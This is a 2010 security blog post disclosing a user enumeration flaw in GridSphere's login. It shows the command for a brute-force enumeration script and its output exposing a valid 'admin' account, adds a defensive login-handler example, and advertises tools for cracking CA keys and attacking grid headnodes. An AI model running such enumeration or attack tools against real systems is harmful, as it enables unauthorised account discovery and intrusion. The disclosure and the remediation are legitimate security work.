
20 Jun 2010

GridSphere Remote User Enumeration

By IPSECS Admin. Posted in Exploitation, News

GridSphere is a web-based portal framework for accessing grid computing resources. It provides an open-source, portlet-based web portal. GridSphere enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container.

GridSphere, which is critically used to access grid resources, has been found vulnerable to remote user enumeration: it can be exploited to determine whether a user is valid in the grid. The vulnerability exists because GridSphere answers a login attempt for a nonexistent user with the response "User does not exist". To exploit this issue, you can use this Python script.

python gridsphere-brute.py https://example.com/acgt/portal?cid=login users.txt

[INVALID] anto
[INVALID] abc
[INVALID] betha
[INVALID] een
[INVALID] nita
[INVALID] aris
[INVALID] atik
[INVALID] babas
[INVALID] alex
[OK] admin
[INVALID] fuck
[INVALID] lisa
[INVALID] ifa
[INVALID] hana
[INVALID] bram
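The remedy is for the login handler to stop distinguishing unknown users from wrong passwords. The sketch below is an added example, not GridSphere code or part of the original post; the account store, function names and the "Incorrect password" wording are assumptions made for illustration.

```python
import hashlib
import hmac
import os

GENERIC_ERROR = "Invalid user name or password"
ITERATIONS = 100_000  # constructed value for this example


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


# Constructed sample account store (hypothetical, not GridSphere's schema).
USERS = {"admin": make_user("correct horse battery staple")}
# Dummy record so unknown users cost the same hashing work as known ones.
DUMMY = make_user("dummy-password-never-valid")


def login_vulnerable(username: str, password: str) -> str:
    """Behaviour described in the post: unknown users get a distinct reply."""
    user = USERS.get(username)
    if user is None:
        return "User does not exist"
    if hmac.compare_digest(hash_password(password, user["salt"]), user["hash"]):
        return "OK"
    return "Incorrect password"  # assumed wording, not taken from the post


def login_hardened(username: str, password: str) -> str:
    """Same reply, and the same hashing work, whether or not the user exists."""
    user = USERS.get(username)
    record = user if user is not None else DUMMY
    matches = hmac.compare_digest(
        hash_password(password, record["salt"]), record["hash"]
    )
    # A match against the dummy record must never authenticate anyone.
    if user is not None and matches:
        return "OK"
    return GENERIC_ERROR
```

The same uniform reply has to be applied to password-reset and registration forms, and paired with rate limiting on failed logins, or the user list can still be inferred elsewhere.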

IPSECS developed some tools to assess grid computing security years ago, which can be downloaded here. The tools are encoded in ASCII and bundled with an article, written in Indonesian, that explains grid computing [in]security. The tools provided can be used to:

  • Enumerate headnodes by identifying the GridFTP Service and Web Service Container
  • Crack the private key in the Certificate Authority
  • Exploit other headnodes in the grid when a headnode and its certificate are compromised.

For your information, IPSECS is currently developing grid-toolkit to make grid computing penetration testing much easier.
